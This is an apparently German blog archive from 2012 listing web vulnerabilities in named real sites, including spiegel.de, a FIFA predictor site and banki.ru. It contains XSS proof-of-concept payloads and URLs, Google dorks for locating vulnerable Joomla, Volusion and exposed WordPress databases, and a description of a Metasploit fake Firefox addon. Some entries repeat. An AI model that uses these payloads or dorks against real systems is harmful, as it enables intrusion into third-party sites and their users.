Friday, 11. May 2012
security.anti-abuse.com - xss
Am Friday, 11. May 2012 im Topic 'Vulnerabilities'
Tuesday, 24. April 2012
spiegel.de - XSS
Am Tuesday, 24. Apr 2012 im Topic 'Vulnerabilities'
URL: http://www.spiegel.de/artikelversand/online/a-823270-de.html
POST: f.emailempfang=alert(navigator.userAgent)
by
watt
POST: f.emailempfang=alert(navigator.userAgent)
by
watt
Thursday, 12. April 2012
joomla (com_estateagent) - SQL
Am Thursday, 12. Apr 2012 im Topic 'Vulnerabilities'
Exploit Title: joomla component (com_estateagent) SQL injection Vulnerability
Date: 10/04/2012
Author: xDarkSton3x
Category:: webapps
Google dork: inurl:"com_estateagent"
Date: 10/04/2012
Author: xDarkSton3x
Category:: webapps
Google dork: inurl:"com_estateagent"
Metasploit & Firefox Fake Extension (XPI)
Am Thursday, 12. Apr 2012 im Topic 'Vulnerabilities'
This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page with. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.
Sunday, 1. April 2012
fifa - XSS
Am Sunday, 1. Apr 2012 im Topic 'Vulnerabilities'
Domain:
de.predictor.fifa.com
URL:
hxxp://de.predictor.fifa.com/M/stats.mc?phase=2%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(%27XSS%20By%20Tur
KPoweR%20-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20:D%27)%3B%3C/ScRiPt%3E%3Ch1%3EXSS%20By%20TurKPoweR%2
0-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20%20:D%3C/h1%3E%3C/marquee%3E
by
TurKPoweR
de.predictor.fifa.com
URL:
hxxp://de.predictor.fifa.com/M/stats.mc?phase=2%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(%27XSS%20By%20Tur
KPoweR%20-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20:D%27)%3B%3C/ScRiPt%3E%3Ch1%3EXSS%20By%20TurKPoweR%2
0-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20%20:D%3C/h1%3E%3C/marquee%3E
by
TurKPoweR
Monday, 26. March 2012
vBulletin 4.1.10 - XSS
Am Monday, 26. Mar 2012 im Topic 'Vulnerabilities'
Friday, 23. March 2012
Various Banks - XSS
Am Friday, 23. Mar 2012 im Topic 'Vulnerabilities'
Demo:
http://www.banki.ru/bitrix/rku.php?id=829&goto=http://xxxxx.com
Google Dork:
inurl:bitrix/rk.php
by
Sony and Flexxpoint
http://www.banki.ru/bitrix/rku.php?id=829&goto=http://xxxxx.com
Google Dork:
inurl:bitrix/rk.php
by
Sony and Flexxpoint
Tuesday, 20. March 2012
Microsoft - XSS
Am Tuesday, 20. Mar 2012 im Topic 'Vulnerabilities'
Saturday, 17. March 2012
WordPress - SQL
Am Saturday, 17. Mar 2012 im Topic 'Vulnerabilities'
Dork:
intext:INSERT INTO 'wp_users` VALUES(1, 'ADMIN'," intext:dump filetype:sql
intext:INSERT INTO 'wp_users` VALUES(1, 'ADMIN'," intext:dump filetype:sql
Thursday, 15. March 2012
Volusion Chat - XSS
Am Thursday, 15. Mar 2012 im Topic 'Vulnerabilities'
Software Link:
http://www.volusion.com/
Google Dorks:
inurl:livechat.aspx?ID= intext:volusion or intext:powered by volusion
by
Sony
http://www.volusion.com/
Google Dorks:
inurl:livechat.aspx?ID= intext:volusion or intext:powered by volusion
by
Sony
... ältere Einträge